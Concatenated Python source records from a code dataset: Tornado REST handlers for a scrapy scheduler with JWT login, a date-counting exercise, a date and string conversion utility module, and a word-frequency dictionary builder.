project, 'version': version, 'status': status, 'message': 'successful'})\n\n async def put(self, *args, **kwargs):\n \"\"\"\n @apiGroup Schedulers-put\n @apiPermission Developer\n @api {put} /schedulers/\n @apiHeader {String} Authorization Json Web Token\n @apiParam {Int} Id From databases.\n @apiParam {Bool} status Whether it is effective.\n @apiParam {String} mode 'date' or 'interval' or 'cron'.\n @apiParam {Dict} timer {'seconds': 5} or {'run_date': '2019-02-20 18:00:00'}.\n @apiSuccessExample {json} Success-Response:\n HTTP/1.1 200 OK\n {'project': query.project, 'version': query.version, 'status': status, 'message': 'successful'}\n @apiErrorExample {json} Error-Response:\n HTTP/1.1 400 OK\n {'message': 'This scheduler does not exist'}\n \"\"\"\n arguments = SchedulersForm(self.request.arguments)\n if not arguments.validate():\n return await self.interrupt(400, 'failed of parameters validator')\n token = self.request.headers.get('Authorization')\n sid = arguments.id.data\n mode = arguments.mode.data\n username = get_username(token)\n status = arguments.status.data\n try:\n timer = ast.literal_eval(arguments.timer.data)\n except Exception as error:\n logging.warning(error)\n return await self.interrupt(400, 'error of timer')\n query = await Schedulers.filter(id=sid).first()\n if not query:\n return await self.interrupt(400, 'This scheduler does not exist')\n try:\n if query.status and not status: # cancel task according to status\n schedulers.remove_job(query.jid)\n if status and not query.status: # add task according to status\n schedulers.add_job(execute_task, mode,\n trigger_args=timer, id=query.jid,\n args=[query.project, query.spider, query.version, mode, timer, username, status])\n if status and status == query.status: # update task according to status\n schedulers.reschedule_job(query.jid, trigger=mode, trigger_args=timer)\n await Schedulers.filter(id=sid).update(mode=mode, timer=arguments.timer.data,\n creator=username, status=status)\n except JobLookupError as error:\n logging.warning(error)\n await Schedulers.filter(id=sid).delete()\n return await self.interrupt(reason='No job by the id of {jid} was found.'\n 'This may be because the timer has expired, not a fatal error.'\n 'The corresponding scheduler will be deleted.'\n 'Don\\'t worry.'.format(jid=query.jid))\n await self.over(data={'project': query.project, 'version': query.version, 'status': status, 'message': 'successful'})\n\n async def delete(self, *args, **kwargs):\n \"\"\"\n @apiGroup Schedulers-delete\n @apiPermission Developer\n @api {delete} /schedulers/\n @apiHeader {String} Authorization Json Web Token\n @apiParam {Int} id project id of databases.\n @apiSuccessExample {json} Success-Response:\n HTTP/1.1 200 OK\n {'id': 1, 'project': 'arts', 'spider': 'fact',\n 'version': 1563020120320, 'jid': '120fd50fsd50fd80sdf', 'mode': 'interval',\n 'timer': '{'seconds': 5}', 'message': 'successful'}\n @apiUse ErrorExamples\n \"\"\"\n arguments = SchedulersForm(self.request.arguments)\n if not arguments.validate():\n return await self.interrupt(400, 'failed of parameters validator')\n sid = arguments.id.data\n query = await Schedulers.filter(id=sid).first()\n if not query:\n return await self.interrupt(400, 'This scheduler does not exist')\n try:\n schedulers.remove_job(query.jid)\n except JobLookupError as error:\n logging.warning(error)\n await Schedulers.filter(id=sid).delete()\n response = {'id': query.id, 'project': query.project, 'spider': query.spider,\n 'version': query.version, 'jid': query.jid, 'mode': query.mode,\n 'timer': 
query.timer, 'message': 'successful'}\n await self.over(200, response)\n\n\nclass RecordsHandler(RestfulHandler):\n permission = 'developer'\n\n async def get(self, *args, **kwargs):\n \"\"\"\n @apiGroup Records-get\n @apiPermission Developer\n @api {get} /records/\n @apiHeader {String} Authorization Json Web Token\n @apiUse Operations\n @apiSuccessExample {json} Success-Response:\n HTTP/1.1 200 OK\n {\"count\": 5,\n \"results\":{'id': 1, 'project': 'arts', 'spider': 'fact',\n 'version': 1563206963652, 'ssp': 1, 'job': 25fd-09098f-2032-dfs20,\n 'mode': 'date, 'timer': {'run_date': '2019-03-10'}, 'status': 1,\n 'start': 2019-03-10 18:00:00, 'end': 2019-03-10 18:00:20,\n 'period': '0-days 20 seconds',\n 'creator': 'username', 'create': 2019-02-22 10:00:00}\n }\n @apiUse ErrorExamples\n \"\"\"\n arguments = RecordsForm(self.request.arguments)\n if not arguments.validate():\n return await self.interrupt(400, 'failed of parameters validator')\n params, offset, limit, ordering = prep(arguments)\n query = await Records.filter(**params).offset(offset).limit(limit).order_by(ordering)\n response = dict(count=len(query))\n response['results'] = [\n {'id': i.id, 'project': i.project, 'spider': i.spider,\n 'version': i.version, 'ssp': i.ssp, 'job': i.job,\n 'mode': i.mode, 'timer': i.timer, 'status': i.status,\n 'start': i.start, 'end': i.end, 'period': i.period,\n 'creator': i.creator, 'create': i.create_time.strftime('%Y-%m-%d %H:%M:%S')}\n for i in query]\n await self.over(data=response)\n\n\nclass OperationLogHandler(RestfulHandler):\n permission = 'superuser'\n\n async def get(self, *args, **kwargs):\n \"\"\"\n @apiGroup OperationLog-get\n @apiPermission Developer\n @api {get} /operations/\n @apiHeader {String} Authorization Json Web Token\n @apiUse Operations\n @apiSuccessExample {json} Success-Response:\n HTTP/1.1 200 OK\n {\"count\": 5,\n \"results\":{'id': 1, 'operator': 'username', 'interface': 'projects',\n 'method': 'GET', 'status_code': 400, 'hostname': 'Mac book',\n 'args': '{'project': 'arts'}', 'address': 127.0.0.1, 'create': 2019-02-22 10:00:00}\n }\n @apiUse ErrorExamples\n \"\"\"\n arguments = OperationLogForm(self.request.arguments)\n if not arguments.validate():\n return await self.interrupt(400, 'failed of parameters validator')\n params, offset, limit, ordering = prep(arguments)\n query = await OperationLog.filter(**params).offset(offset).limit(limit).order_by(ordering)\n response = dict(count=len(query))\n response['results'] = [\n {'id': i.id, 'operator': i.operator, 'interface': i.interface,\n 'method': i.method, 'status_code': i.status_code, 'hostname': i.hostname,\n 'args': i.args, 'address': i.address, 'create': i.operation_time.strftime('%Y-%m-%d %H:%M:%S')}\n for i in query]\n await self.over(data=response)\n\n\nclass RegisterHandler(RestfulHandler):\n\n async def post(self):\n \"\"\"\n @apiGroup Register-put\n @api {put} /reg/\n @apiParam {String} username username.\n @apiParam {String} password password.\n @apiParam {String} email email.\n @apiParam {String} role 'observer' or 'developer' or 'superuser'.\n @apiSuccessExample {json} Success-Response:\n HTTP/1.1 201 OK\n {'message': 'welcome:{username} '.format(username=username)}\n @apiErrorExample {json} Error-Response:\n HTTP/1.1 400 OK\n {'message': 'superuser is exist'}\n \"\"\"\n arguments = UserForm(self.request.arguments)\n if not arguments.validate():\n return await self.interrupt(400, 'failed of parameters validator')\n username = arguments.username.data\n email = arguments.email.data\n role = 
arguments.role.data\n password = arguments.password.data\n pwd = str_to_hash(password)\n code = random_characters(n=6)\n if role == 'superuser':\n superuser_exits = await User.filter(role='superuser').count()\n if superuser_exits:\n return await self.interrupt(400, 'superuser is exist')\n res = await User.filter(Q(username=username) | Q(email=email))\n if res:\n return await self.interrupt(400, 'username or email is exist')\n await User.create(username=username, password=pwd, email=email, code=code, role=role)\n await self.over(201, {'message': 'welcome:{username} '.format(username=username)})\n\n\nclass LoginHandler(RestfulHandler):\n\n async def post(self, *args, **kwargs):\n \"\"\"\n @apiGroup Login-post\n @api {put} /login/\n @apiParam {String} username username.\n @apiParam {String} password password.\n @apiParam {String} [code] verify code(superuser do not need code).\n\n @apiSuccessExample {json} Success-Response:\n HTTP/1.1 200 OK\n {'id': 1, 'username': user.username, 'token': 'fda14afw.4f6afd8.fa4fdfa.fdw5f'}\n @apiErrorExample {json} Error-Response:\n HTTP/1.1 400 OK\n {'message': 'verify code error'}\n \"\"\"\n arguments = LoginForm(self.request.arguments)\n if not arguments.validate():\n return await self.interrupt(400, 'failed of parameters validator')\n username = arguments.username.data\n pwd = str_to_hash(arguments.password.data)\n code = arguments.code.data\n user = await User.filter(Q(username=username) & Q(password=pwd)).first()\n if not user:\n return await self.interrupt(400, 'username or password error')\n payload = {'id': user.id, 'username': user.username, 'exp': datetime.utcnow()}\n token = jwt.encode(payload, SECRET, ALGORITHM).decode('utf8')\n if user.role == 'superuser' or user.verify and user.status:\n return await self.over(data={'id': user.id, 'username': user.username, 'token': token})\n superuser = await User.filter(role='superuser').first()\n if user.status and not user.verify:\n res = await User.filter(Q(username=username) & Q(password=pwd) & Q(code=code)).first()\n if res:\n await User.filter(Q(username=username) & Q(password=pwd) & Q(code=code)).update(verify=True)\n return await self.over(data={'id': user.id, 'username': user.username, 'token': token})\n else:\n return await self.interrupt(400,\n 'verify code error, '\n 'please contact the superuser:{username}(email:{email})'\n .format(username=superuser.username, email=superuser.email))\n return await self.interrupt(400,\n 'user status is false,'\n 'please contact the superuser:{username}(email:{email})'\n .format(username=superuser.username, email=superuser.email))\n\n\nclass UserHandler(RestfulHandler):\n permission = 'superuser'\n\n async def get(self):\n \"\"\"\n @apiGroup User-get\n @apiPermission Superuser\n @api {get} /user/\n @apiHeader {String} Authorization Json Web Token\n @apiUse Operations\n @apiSuccessExample {json} Success-Response:\n HTTP/1.1 200 OK\n {\"count\": 5,\n \"results\":{'id': 1, 'username': 'username', 'status': true,\n 'verify': true, 'code': 'flower', 'create_time': 2019-02-22 10:00:00}\n }\n @apiUse ErrorExamples\n \"\"\"\n arguments = UserForm(self.request.arguments)\n if not arguments.validate():\n return await self.interrupt(400, 'failed of parameters validator')\n params, offset, limit, ordering = prep(arguments)\n query = await User.filter(**params).offset(offset).limit(limit).order_by(ordering)\n response = dict(count=len(query))\n response['results'] = [\n {'id': i.id, 'username': i.username, 'status': i.status,\n 'verify': i.verify, 'code': i.code, 'create': 
i.create_time.strftime('%Y-%m-%d %H:%M:%S')}\n for i in query]\n await self.over(data=response)\n\n async def put(self, *args, **kwargs):\n \"\"\"\n @apiGroup User-put\n @apiPermission Superuser\n @api {put} /user/\n @apiParam {Int} id user id.\n @apiParam {String} [password] password.\n @apiParam {Bool} [status] status.\n @apiParam {String} [email] email.\n @apiSuccessExample {json} Success-Response:\n HTTP/1.1 200 OK\n {'message': 'successful'}\n @apiErrorExample {json} Error-Response:\n HTTP/1.1 400 OK\n {'message': 'user does not exist'}\n \"\"\"\n arguments = LoginForm(self.request.arguments)\n if not arguments.validate():\n return await self.interrupt(400, 'failed of parameters validator')\n uid = arguments.id.data\n password = str_to_hash(arguments.password.data) if len(arguments.password.data) > 5 else None\n status = arguments.status.data\n email = arguments.email.data\n query = await User.filter(id=uid).first()\n if not query:\n return await self.interrupt(400, 'user does not exist')\n params = {}\n if all([email, len(email) > 5, email != query.email]):\n params['email'] = email\n if password != query.password and password:\n params['password'] = password\n if all([status, isinstance(status, bool), status != query.status]):\n params['status'] = status\n await User.filter(id=uid).update(**params)\n await self.over(data={'message': 'successful'})\n\n async def delete(self, *args, **kwargs):\n \"\"\"\n @apiGroup User-delete\n @apiPermission Superuser\n @api {delete} /user/\n @apiParam {Int} id user id.\n @apiSuccessExample {json} Success-Response:\n HTTP/1.1 200 OK\n {'message': 'successful'}\n @apiErrorExample {json} Error-Response:\n HTTP/1.1 400 OK\n {'message': 'user does not exist'}\n \"\"\"\n arguments = LoginForm(self.request.arguments)\n if not arguments.validate():\n return await self.interrupt(400, 'failed of parameters validator')\n user_id = arguments.id.data\n query = await User.filter(id=user_id).first()\n if not query:\n return await self.interrupt(400, 'user does not exist')\n await User.filter(id=user_id).delete()\n await self.over(200, {'message': 'successful'})\n\n\n","repo_name":"asyncspider/AsyncSpiderweb","sub_path":"AsyncSpiderweb/component/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":26323,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"51"} {"seq_id":"22225736259","text":"# Counting dates\n\nT = int(input())\n\nfor t in range(1, T + 1):\n\n calender = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12]\n dict_day = {1: 31, 2: 28, 3: 31, 4: 30, 5: 31, 6: 30, 7: 31, 8: 31, 9: 30, 10: 31, 11: 30, 12: 31}\n\n first_Month, first_Day, second_Month, second_Day = map(int, input().split())\n days = 0\n\n if first_Month + 1 < second_Month:\n months = calender[first_Month : second_Month - 1] # months between two days\n \n for month in months: # days in those months\n days += dict_day[month]\n \n # days in Second Month\n days += second_Day\n\n # days in First Month\n first_month_days = dict_day[first_Month] - first_Day + 1\n days += first_month_days\n\n elif first_Month + 1 == second_Month: # there is no month between two days\n \n days += second_Day\n\n first_month_days = dict_day[first_Month] - first_Day + 1\n days += first_month_days\n\n else:\n days += second_Day - first_Day + 1\n\n print(f'#{t} {days}')\n\n","repo_name":"seoul-ssafy-class-2-studyclub/heecheol","sub_path":"SWEA/d2/날짜 계산기.py","file_name":"날짜 
계산기.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"2064928662","text":"from datetime import date\r\nfrom dateutil.parser import parse\r\nimport datetime\r\nfrom unidecode import unidecode\r\n\r\nfrom math import log\r\nimport hashlib\r\nimport os\r\nimport argparse\r\n\r\ndef __timeconversion(timein):\r\n strs = timein.split(':')\r\n if len(strs)==3:\r\n timeout = strs[0] + ':' + strs[1] + \":00\" #ignore second\r\n else:\r\n timeout = timein\r\n return timeout\r\n\r\ndef convertDate_1(startDate, startTime):\r\n dateappointed = startDate + \" \" + startTime\r\n try:\r\n dateconverted = parse(dateappointed) \r\n except ValueError:\r\n msg = \"Error: Incorrect date format not in MM/DD/YYYY: '\" + dateappointed + \"'\"\r\n dateconverted = dateappointed\r\n\r\n return dateconverted\r\n\r\ndef __convertDateFormat(fieldValue):\r\n DATE_FORMAT = \"%Y-%m-%d\" \r\n TIME_FORMAT = \"%H:%M:%S\"\r\n\r\n if isinstance(fieldValue, datetime.date):\r\n fieldValueOut = fieldValue.strftime(DATE_FORMAT)\r\n elif isinstance(fieldValue, datetime.time):\r\n fieldValueOut = fieldValue.strftime(TIME_FORMAT)\r\n elif isinstance(fieldValue, datetime.datetime):\r\n fieldValueOut = fieldValue.strftime(\"%s %s\" % (DATE_FORMAT, TIME_FORMAT))\r\n else:\r\n fieldValueOut = fieldValue\r\n \r\n return fieldValueOut\r\n\r\ndef toInt(valueIn):\r\n if valueIn is None:\r\n valueOut = 0\r\n else:\r\n try:\r\n valueOut = int(valueIn)\r\n except:\r\n valueOut = 0\r\n return valueOut\r\n\r\ndef toString(itemIn):\r\n return toStringPython2(itemIn)\r\n \r\n if itemIn is None:\r\n itemOut = ' '\r\n else:\r\n if type(itemIn) == str:\r\n itemOut = str(itemIn)\r\n else:\r\n try:\r\n itemOut = str(itemIn)\r\n except:\r\n itemOut = unidecode(itemIn)\r\n return itemOut.strip()\r\n\r\n\r\ndef toStringPython2(itemIn):\r\n if itemIn is None:\r\n itemOut = ' '\r\n return itemOut\r\n \r\n try:\r\n itemOut = str(itemIn)\r\n except:\r\n strtype = type(itemIn)\r\n if strtype == unicode: \r\n itemOut = itemIn.encode(\"utf-8\")\r\n itemOut = str(itemOut)\r\n else:\r\n itemOut = unidecode(itemIn)\r\n \r\n return itemOut.strip()\r\n \r\ndef toStringPython3(itemIn):\r\n if itemIn is None:\r\n itemOut = ' '\r\n return itemOut\r\n \r\n try:\r\n itemOut = str(itemIn)\r\n except:\r\n itemOut = unidecode(itemIn)\r\n return itemOut.strip()\r\n\r\ndef toBinary(valueIn):\r\n if valueIn is None:\r\n valueOut = False\r\n elif valueIn==0:\r\n valueOut = False\r\n elif valueIn==1:\r\n valueOut = True\r\n else:\r\n valueOut = False\r\n \r\n return valueOut\r\n\r\ndef toBinaryTinyInt(valueIn):\r\n valueOut = 0\r\n if valueIn is None:\r\n return valueOut \r\n \r\n try:\r\n valueOut = int(valueIn)\r\n if valueOut!=1:\r\n valueOut = 0\r\n \r\n except ValueError:\r\n try:\r\n sss = str(valueIn)\r\n sss = sss.lower().strip()\r\n if sss=='true':\r\n valueOut = 1\r\n elif sss=='yes':\r\n valueOut = 1\r\n else:\r\n valueOut = 0\r\n except ValueError:\r\n valueOut = 0\r\n \r\n return valueOut\r\n\r\ndef toFloat(valueIn):\r\n if valueIn is None:\r\n valueOut = 0.0\r\n else:\r\n try:\r\n valueOut = float(valueIn)\r\n except ValueError:\r\n valueOut = 0.0\r\n \r\n return valueOut\r\n\r\ndef formatPercent(valueIn, zerostring=' '):\r\n if valueIn is None:\r\n valueOut = zerostring\r\n elif valueIn==0:\r\n valueOut = zerostring\r\n else:\r\n value = \"%.0f\" % valueIn\r\n valueOut = str(value)\r\n return valueOut\r\n\r\ndef formatStringMSSQL(strin):\r\n if strin is 
None:\r\n strout = strin\r\n else:\r\n strin = strin.strip()\r\n if \"'\" in strin:\r\n str1 = strin.replace(\"'\", \"''\")\r\n else:\r\n str1 = strin\r\n \r\n if '\"' in str1:\r\n strout = str1.replace('\"', \"''\")\r\n else:\r\n strout = str1\r\n return strout\r\n\r\ndef intToStr(valueIn):\r\n if valueIn is None:\r\n valueOut = ' '\r\n elif valueIn==0:\r\n valueOut = ' '\r\n else:\r\n valueOut = str(valueIn)\r\n return valueOut\r\n \r\n\r\ndef format_currency(valueIn, nonestring='$0'):\r\n if valueIn is None:\r\n value = nonestring \r\n elif valueIn < 0:\r\n try:\r\n results = '${:,.0f}'.format(valueIn)\r\n value = \"(\" + results.replace(\"-\",\"\") + \")\"\r\n except ValueError:\r\n value = str(valueIn)\r\n \r\n elif valueIn > 0:\r\n results = '${:,.0f}'.format(valueIn)\r\n value = str(results)\r\n else:\r\n value = nonestring\r\n return value\r\n\r\ndef toCurrency(valueIn, nonestring='$0'):\r\n if valueIn is None:\r\n valueOut = nonestring\r\n elif not is_numeric(valueIn):\r\n valueOut = nonestring\r\n elif valueIn==0:\r\n valueOut = nonestring\r\n else:\r\n valueOut = format_currency(toFloat(valueIn))\r\n return valueOut\r\n\r\n\r\ndef fromCurrency(valueIn):\r\n if valueIn is None:\r\n valueOut = 0\r\n return valueOut\r\n \r\n sss = str(valueIn)\r\n if sss[0]=='$': \r\n sss = sss[1:] \r\n \r\n if ',' in sss: \r\n sss=sss.replace(',', '') \r\n\r\n try:\r\n valueOut = float(sss)\r\n except ValueError:\r\n valueOut = 0\r\n return valueOut\r\n\r\ndef toDate(dateIn):\r\n if dateIn is None:\r\n dateOut = ' '\r\n else:\r\n dt = datetime.datetime.strptime(dateIn, '%Y-%m-%d')\r\n dateOut = '{0}/{1}/{2:02}'.format(dt.month, dt.day, dt.year % 100)\r\n return dateOut\r\n \r\ndef toUSDate(dateIn):\r\n if dateIn is None:\r\n dateOut = ' '\r\n else:\r\n dt = datetime.datetime.strptime(dateIn, '%Y-%m-%d')\r\n dateOut = '{0:02}/{1:02}/{2:04}'.format(dt.month, dt.day, dt.year)\r\n return dateOut\r\n \r\ndef toDateClass(datetimein):\r\n if datetimein is None:\r\n return None\r\n \r\n if isinstance(datetimein, datetime.date):\r\n return datetimein\r\n elif isinstance(datetimein, datetime.time):\r\n return None\r\n elif isinstance(datetimein, datetime.datetime):\r\n return datetimein\r\n \r\n strs1 = datetimein.split(' ')\r\n if len(strs1)>1:\r\n strs2 = strs1[0]\r\n if len(strs1[1])>0:\r\n return None\r\n else:\r\n strs2 = datetimein\r\n \r\n if '/' in strs2:\r\n strs3 = strs2.split('/')\r\n if len(strs3)==3:\r\n yearStr = strs3[2]\r\n if len(yearStr)!=4:\r\n return None\r\n \r\n try:\r\n dateout = date(int(strs3[2]), int(strs3[0]), int(strs3[1]))\r\n except:\r\n dateout = None\r\n else:\r\n dateout = None\r\n elif '-' in strs2:\r\n strs3 = strs2.split('-')\r\n if len(strs3)==3:\r\n try:\r\n dateout = date(int(strs3[0]), int(strs3[1]), int(strs3[2]))\r\n except:\r\n dateout = None\r\n else:\r\n dateout = None\r\n else:\r\n dateout = None\r\n \r\n return dateout\r\n \r\ndef dateconversion(datetimein):\r\n if datetimein is None:\r\n return \" \"\r\n \r\n strs1 = datetimein.split(' ')\r\n if len(strs1)>1:\r\n strs2 = strs1[0]\r\n strs3 = strs2.split('/')\r\n if len(strs3)==3:\r\n dateout = date(int(strs3[2]), int(strs3[0]), int(strs3[1]))\r\n else:\r\n dateout = strs2\r\n\r\n timein = strs1[1] \r\n timeout = __timeconversion(timein)\r\n datetimeout = str(dateout) + 'T' + timeout\r\n else:\r\n strs3 = datetimein.split('/')\r\n if len(strs3)==3:\r\n dateout = date(int(strs3[2]), int(strs3[0]), int(strs3[1]))\r\n else:\r\n dateout = datetimein\r\n\r\n datetimeout = str(dateout)\r\n return datetimeout \r\n 
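\r\n# Editor's note (illustrative addition, not part of the original module): dateconversion parses\r\n# US-style 'M/D/YYYY[ HH:MM:SS]' inputs and passes other formats through unchanged, e.g.\r\n# dateconversion('8/16/2012 14:30:05') -> '2012-08-16T14:30:00' (seconds are zeroed by __timeconversion).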
\r\ndef toISODate(datetimein):\r\n if datetimein is None:\r\n return None\r\n \r\n if isinstance(datetimein, datetime.date):\r\n try:\r\n dateout = datetimein.date()\r\n except:\r\n dateout = datetimein\r\n return dateout\r\n str0 = str(datetimein)\r\n strs1 = str0.split(' ')\r\n if len(strs1)>1:\r\n strs2 = strs1[0] # '8/16/2012'\r\n strs3 = strs2.split('/')\r\n if len(strs3)==3:\r\n try:\r\n dateout = date(int(strs3[2]), int(strs3[0]), int(strs3[1]))\r\n except:\r\n dateout = None\r\n else:\r\n dateout = strs2\r\n else:\r\n strs3 = datetimein.split('/')\r\n if len(strs3)==3:\r\n try:\r\n dateout = date(int(strs3[2]), int(strs3[0]), int(strs3[1]))\r\n except:\r\n dateout = None\r\n else:\r\n dateout = datetimein\r\n\r\n if dateout is None:\r\n datetimeout = None\r\n else:\r\n datetimeout = str(dateout) \r\n return datetimeout \r\n \r\ndef monthconversion(datetimein):\r\n strs1 = datetimein.split(' ')\r\n if len(strs1)>1:\r\n strs2 = strs1[0] \r\n strs3 = strs2.split('/')\r\n if len(strs3)==3:\r\n dateout = date(int(strs3[2]), int(strs3[0]), int(strs3[1]))\r\n else:\r\n dateout = strs2\r\n\r\n timein = strs1[1] \r\n timeout = __timeconversion(timein)\r\n datetimeout = str(dateout) + 'T' + timeout\r\n else:\r\n strs3 = datetimein.split('/')\r\n if len(strs3)==3:\r\n dateout = strs3[0] + '/' + strs3[2]\r\n else:\r\n dateout = datetimein\r\n\r\n datetimeout = str(dateout) \r\n return datetimeout \r\n \r\ndef dateToString(dateIn):\r\n if dateIn is None:\r\n dateOut = ' '\r\n else:\r\n if isinstance(dateIn, datetime.date):\r\n dateOut = '{0}/{1}/{2:02}'.format(dateIn.month, dateIn.day, dateIn.year % 100)\r\n elif isinstance(dateIn, datetime.datetime):\r\n dateOut = '{0}/{1}/{2:02}'.format(dateIn.month, dateIn.day, dateIn.year % 100)\r\n else:\r\n dateOut = str(dateIn)\r\n return dateOut\r\n\r\ndef dateToISOstring(dateIn):\r\n if dateIn is None:\r\n dateOut = ' '\r\n else:\r\n if isinstance(dateIn, datetime.date):\r\n dateOut = '{0:04}-{1}-{2}'.format(dateIn.year, dateIn.month, dateIn.day)\r\n elif isinstance(dateIn, datetime.datetime):\r\n dateOut = '{0:04}-{1}-{2}'.format(dateIn.year, dateIn.month, dateIn.day)\r\n else:\r\n dateOut = str(dateIn)\r\n return dateOut\r\n\r\ndef convertDateListToString(fieldName, objsdiclist):\r\n newlist = []\r\n for objdic in objsdiclist:\r\n fieldValue = objdic[fieldName]\r\n objdic[fieldName] = dateToString(fieldValue)\r\n newlist.append(objdic)\r\n \r\n return newlist\r\n\r\ndef checkSingleQuote(stringIn):\r\n strtemp = stringIn\r\n if \"''\" in stringIn:\r\n strtemp = stringIn.replace(\"''\", \"__\")\r\n \r\n if \"'\" in strtemp:\r\n strtemp = strtemp.replace(\"'\", \"''\")\r\n \r\n if \"__\" in strtemp:\r\n strtemp = strtemp.replace(\"__\", \"''\")\r\n \r\n return strtemp\r\n \r\ndef is_numeric(s):\r\n if s is None:\r\n return False\r\n \r\n try:\r\n i = float(s)\r\n except ValueError:\r\n return False\r\n return True\r\n \r\ndef getYearFromDate(dateIn):\r\n year = 0\r\n if \"/\" in dateIn:\r\n terms = dateIn.split(\"/\")\r\n if len(terms)==3:\r\n year = int(terms[2])\r\n else:\r\n year = 0\r\n elif \"-\" in dateIn:\r\n terms = dateIn.split(\"-\")\r\n if len(terms)==3:\r\n year = int(terms[0])\r\n else:\r\n year = 0\r\n return year\r\n \r\ndef toStringDB(itemIn):\r\n if itemIn is None:\r\n itemOut = ' '\r\n else:\r\n if type(itemIn) == str:\r\n itemOut = str(itemIn)\r\n else:\r\n try:\r\n itemOut = str(itemIn)\r\n except:\r\n itemOut = unidecode(itemIn)\r\n \r\n if '\\x19' in itemOut:\r\n itemOut = itemOut.replace('\\x19', '')\r\n return itemOut.strip()\r\n 
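\r\n# Editor's note (illustrative addition, not part of the original module): checkSingleQuote doubles\r\n# lone single quotes for SQL string literals while leaving already-doubled ones intact, e.g.\r\n# checkSingleQuote(\"O'Brien\") -> \"O''Brien\".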
\r\ndef cleanStringDB(itemIn):\r\n if type(itemIn)==unicode:\r\n itemOut = itemIn.encode(\"utf-8\")\r\n return itemOut\r\n \r\n newitem = unicode(itemIn, \"utf-8\", errors=\"ignore\")\r\n itemOut = unidecode(newitem)\r\n return itemOut\r\n\r\ndef verifyUSDate(usdateIn):\r\n try:\r\n datetime.datetime.strptime(usdateIn, '%m/%d/%Y')\r\n return True\r\n except ValueError:\r\n return False\r\n \r\ndef convertBoolstrToInt(valueIn):\r\n if valueIn is None:\r\n value = -1\r\n return value\r\n \r\n valueStr = str(valueIn)\r\n valueStr = valueStr.upper()\r\n if valueStr==\"YES\":\r\n value = 1\r\n elif valueStr==\"NO\":\r\n value = 0\r\n elif valueStr==\"1\":\r\n value = 1\r\n elif valueStr==\"0\":\r\n value = 0\r\n else:\r\n value = -1\r\n \r\n return value\r\n\r\ndef convertBoolstrToBool(valueIn):\r\n if valueIn is None:\r\n value = False\r\n return value\r\n \r\n valueStr = str(valueIn)\r\n valueStr = valueStr.upper()\r\n if valueStr==\"YES\":\r\n value = True\r\n elif valueStr==\"NO\":\r\n value = False\r\n elif valueStr==\"1\":\r\n value = True\r\n elif valueStr==\"0\":\r\n value = False\r\n elif valueStr==\"TRUE\":\r\n value = True\r\n elif valueStr==\"FALSE\":\r\n value = False\r\n else:\r\n value = False\r\n \r\n return value\r\n \r\ndef convertInttoBoolstr(valueIn):\r\n if valueIn is None:\r\n value = '?'\r\n elif valueIn==1:\r\n value = \"Yes\"\r\n elif valueIn==0:\r\n value = \"No\"\r\n else:\r\n value = '?'\r\n \r\n return value\r\n\r\ndef percentToFloat(percentIn):\r\n if percentIn is None:\r\n return 0.00\r\n \r\n valuein = str(percentIn)\r\n valuein= valuein.strip()\r\n if \"%\" in valuein:\r\n valuein = valuein.replace('%','')\r\n \r\n pct = toFloat(valuein)\r\n return pct\r\n \r\ndef percentValidate(pct, pctmin, pctmax):\r\n msg = \"okay\"\r\n status = 1\r\n if pct is None:\r\n msg = \"Percent not valid: None\"\r\n status = 0\r\n return msg, status\r\n \r\n try:\r\n pctstr = str(pct)\r\n if \"%\" in pctstr:\r\n pctstr = pctstr.replace('%','')\r\n \r\n fpct = float(pctstr)\r\n if fpct < pctmin or fpct > pctmax:\r\n msg = \"Percent not valid: \" + str(pct)\r\n status = 0\r\n else:\r\n value = percentToFloat(fpct)\r\n msg = \"Percent converted: \" + str(value) + ' from ' + str(pct)\r\n \r\n except:\r\n msg = \"Percent not valid: \" + pct\r\n status = 0\r\n \r\n return msg, status\r\n \r\n
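# Example (hypothetical bounds): percentValidate accepts values inside\r\n# [pctmin, pctmax] and rejects the rest.\r\n# percentValidate('85%', 0, 100) -> (\"Percent converted: 85.0 from 85%\", 1)\r\n# percentValidate(120, 0, 100) -> (\"Percent not valid: 120\", 0)\r\n\r\n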
\"\r\n status = 0\r\n return msg, status\r\n \r\n try:\r\n strok = str(strIn)\r\n strok = strok.strip()\r\n if strok not in validStrings:\r\n msg = \"String not on the list: \" + strok\r\n status = 0\r\n else:\r\n msg = \"String is valid: \" + strok\r\n #status = 0\r\n except:\r\n msg = \"String not valid: \" + strIn\r\n status = 0\r\n \r\n return msg, status\r\n \r\n \r\ndef retrieveSubset(listdics, headers):\r\n newlistdics = []\r\n for row in listdics:\r\n newrow = dict((k, row[k]) for k in headers if k in row)\r\n newlistdics.append(newrow)\r\n return newlistdics \r\n \r\ndef convertInttoBoolstr(valueIn):\r\n if value is None:\r\n value = 'N/A'\r\n value = '?'\r\n elif value==1:\r\n value = \"Yes\"\r\n elif value==0:\r\n value = \"No\"\r\n else:\r\n value = 'N/A'\r\n value = '?'\r\n \r\n return value \r\n \r\ndef convertBoolstrToInt(valueIn):\r\n if valueIn is None:\r\n value = -1\r\n return value\r\n \r\n valueStr = str(valueIn)\r\n valueStr = valueStr.upper()\r\n if valueStr==\"YES\":\r\n value = 1\r\n elif valueStr==\"NO\":\r\n value = 0\r\n elif valueStr==\"1\":\r\n value = 1\r\n elif valueStr==\"0\":\r\n value = 0\r\n else:\r\n value = -1\r\n \r\n return value\r\n\r\ndef floatToStr(valueIn):\r\n if valueIn is None:\r\n valueOut = str(NONE_VALUE)\r\n elif valueIn==0:\r\n valueOut = '0'\r\n else:\r\n valueOut = str(valueIn)\r\n return valueOut\r\n\r\ndef toUSAZipcode(valueIn):\r\n if valueIn is None:\r\n valueOut = ''\r\n elif len(str(valueIn))==0:\r\n valueOut = ''\r\n else:\r\n valueOut = str(valueIn).zfill(5)\r\n return valueOut\r\n\r\ndef dateToStringUK(dateIn):\r\n if dateIn is None:\r\n dateOut = None\r\n elif len(str(dateIn))==0:\r\n dateOut = None\r\n elif len(str(dateIn))<4:\r\n dateOut = None\r\n elif len(str(dateIn))==4:\r\n try:\r\n dt = parse(str(dateIn))\r\n dateOut = '{0:04}-{1}-{2}'.format(dt.year, 12, 31)\r\n except ValueError:\r\n msg = 'Not right date format: ', dateIn\r\n dateOut = None\r\n else:\r\n if isinstance(dateIn, datetime.date):\r\n dateOut = '{0:04}-{1}-{2}'.format(dateIn.year, dateIn.month, 